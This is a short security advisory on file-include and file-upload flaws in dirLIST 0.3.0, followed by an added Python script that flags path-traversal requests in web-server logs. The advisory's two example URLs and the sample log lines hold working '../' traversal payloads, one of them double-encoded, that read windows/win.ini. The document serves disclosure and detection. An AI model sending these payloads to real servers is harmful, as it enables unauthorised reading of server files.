source: https://www.securityfocus.com/bid/54933/info

dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini

http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini
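
For triage, the sketch below scans web-server access logs for requests to the two scripts above whose `image_path` value resolves outside the directory it is relative to. It is an added example, not part of the original advisory or the dirLIST code; the combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts and parameter named in the advisory's example URLs.
SCRIPTS = ("show_scaled_image.php", "thumb_gen.php")
PARAM = "image_path"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def escapes_base(value, max_decode=3):
    """True if value, after repeated URL-decoding, leaves its base directory."""
    for _ in range(max_decode):           # peel nested percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")      # Windows accepts both separators
    if "\x00" in value or value.startswith("/") or re.match(r"^[A-Za-z]:", value):
        return True                       # NUL byte, absolute path or drive letter
    return posixpath.normpath(value).split("/")[0] == ".."

def suspicious_requests(log_lines):
    """Return (line_number, value) for flagged requests to the two scripts."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(SCRIPTS):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if escapes_base(value):
                hits.append((n, value))
    return hits

# Constructed sample lines (assumed combined log format), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2012:10:00:01 +0000] "GET /dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Aug/2012:10:00:02 +0000] "GET /dirlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Aug/2012:10:00:03 +0000] "GET /dirlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=holiday/beach.jpg HTTP/1.1" 200 20480',
    '198.51.100.7 - - [10/Aug/2012:10:00:04 +0000] "GET /dirlist_0.3.0/index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for n, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: image_path={value!r}")
```

A hit only shows that the request was made; the response status and size in the same log line help decide whether file contents were actually returned.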